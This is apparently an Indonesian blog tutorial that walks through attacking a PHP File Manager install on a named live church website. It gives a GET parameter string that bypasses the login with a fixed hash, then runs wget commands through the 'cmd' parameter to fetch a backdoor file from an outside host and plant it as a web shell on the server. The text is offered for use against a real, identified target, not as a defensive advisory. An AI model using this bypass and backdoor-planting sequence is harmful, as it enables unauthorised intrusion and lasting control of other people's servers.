PHP Filemanager Bypass Login And Get RCE Exploit

Kali ini aing akan share bagaimana mengexploitasi bisa dibilang Plugins PHP Filemanager dengan bypass login dan tambahan RCE untuk membuat sebuah backdoor didalam. Bagaimana caranya? Simak sampai bawah.

Exploit Title : PHP Filemanager RCE

Tested On : Linux
Live bug : http://malayattoorchurch.com/galerany/phpfm.php

Buka live bug di atas menggunakan Browser Chrome , Mozilla Firefox , ataupun browser yang suka kalian gunakan.

Oke bisa kalian lihat PHP Filemanager di atas , loh kenapa harus masukin password ? tenang saja kita lakukan bypass terlebih dahulu.

Parameter GET: ?blockKeys[0]=&fm_self=FOOO&loggedon=d41d8cd98f00b204e9800998ecf8427e&action=6&cmd=

Masukan parameter di atas setelah phpfm.php berikut penampakannya :

Wohoo... lanjut kita coba inpiut sebuah backdoor , kita bisa menggunakan fungsi echo, curl ataupun wget. Kali ini saya menggunakan fungsi wget  :

command : wget https://site.com/door.txt
                     wget https://site.com/door.txt -O su.php.accdb

Sekarang kita cek apakah berhasil di wget atau tidak  :

Berhasil , backdoor tertanam pada directory /galery/su.php.accdb inget ya tiap web mungkin berbeda pathnya .

Thanks to: Febrian ID
source: tasik9etar & ur-solution